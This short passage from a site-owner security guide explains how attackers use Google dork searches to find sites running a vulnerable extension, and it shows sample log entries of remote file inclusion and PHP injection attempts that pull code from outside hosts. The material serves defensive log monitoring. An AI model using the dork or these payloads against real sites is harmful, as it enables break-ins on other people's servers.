Finding Targets to Attack
A "Dork" is a Google search to locate targets. Those targets can be simply a specific version of an extension or a device such as a webcam on a specific port.
Let us say a bad guy finds out that the extension is vulnerable from one of the many exploits or responsible disclosure sites. He or she could Google all the targets like this:
inurl:"/com_example/"
In this example, the com_example would be the extension you are searching for. Once this search is run, it will yield a lovely list of targets.
This sort of thing happens every time a new exploit is reported. Everyone rushes out to try and break into your site. You want to watch your logs such as this:
http://www.yourdomain.com/index.php?option=com_noticias&Itemid=xcorpitx&task=detalhe&id=http://www.XXXXXX.net/3333/read/test.txt??
/?mosConfig_absolute_path=http://xxxxx.yyyyyyyyyyy.pt/test.txt?
/poll/comments.php?id=%7B$%7Binclude($aaa)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http
These are three examples...
